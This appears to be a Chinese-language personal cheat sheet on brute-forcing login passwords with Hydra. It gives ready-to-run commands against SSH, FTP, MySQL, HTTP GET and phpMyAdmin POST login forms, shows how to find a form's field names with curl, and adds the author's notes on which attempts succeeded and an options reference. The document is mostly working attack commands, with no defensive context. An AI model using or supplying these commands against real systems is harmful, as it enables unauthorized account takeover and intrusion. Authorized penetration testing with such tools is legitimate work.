hydra九头蛇是常用的密码破解工具

1、破解centos ssh密码

hydra -l root -P password.txt ssh://192.168.1.107:2222
hydra -l root -P password.txt -s 2222 192.168.1.107 ssh

2、破解ftp

hydra  -l allen -P e:\aa.txt ftp://127.0.0.1
hydra  -l allen -P e:\aa.txt ftp://127.0.0.1:21
hydra  -l allen -P e:\aa.txt -s 21 127.0.0.1 ftp

3、破解mysql(我没有破解成功，但是我用metasploit破解成功了)

hydra -l root -P password.txt -s 3306 192.168.1.107 mysql
hydra -l root -P password.txt  mysql://192.168.1.107:3306

4、http-get破解

hydra -l admin -P passwords.txt http-get://example.com

5、http-post破解

# 先找到post提交用的登录用户名和密码表单一般是name="xxx"
curl -s http://192.168.1.105/phpMyAdmin/index.php|grep --color "name"
--------------------------------<input type="text" name="pma_username" id="input_username" value="" size="24" class="textfield"/><input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" /># 再执行命令（该网站burpsuite没有破解成功，但是hydra破解成功了）
hydra -l root -P password.txt 192.168.1.105  http-post-form "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^:error"
hydra -L username.txt -P password.txt 192.168.1.105  http-post-form "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^:error"
----------------
-L 指定用户，它会一个用户和一堆密码进行比对，然后再用第2个用户和一堆密码进行比对，一直比对到最后一个用户
http-post-from表示post请求方式
/phpMyAdmin/index.php是请求的url页面
pma_username=^USER^ 前面是查到表单登录用户的值  ^USER^是固定写法
error:   是固定写法一定要这样写否则会出问题(已验证)

帮助

hydra [options] target [protocol] 
-l login：小写，指定用户名进行破解。
-L file：大写，指定用户的用户名字典。
-p pass：小写，用于指定密码破解，很少使用，一般采用密码字典。
-P file：大写，用于指定密码字典。
-C：使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-e ns：额外的选项，n：空密码试探；s：使用指定账户和密码试探。
-o file：指定结果输出到文件。
-s port：小写，可通过此参数指定非默认端口。
-t tasks：指定并发任务数，默认为16。
-vV：显示详细过程。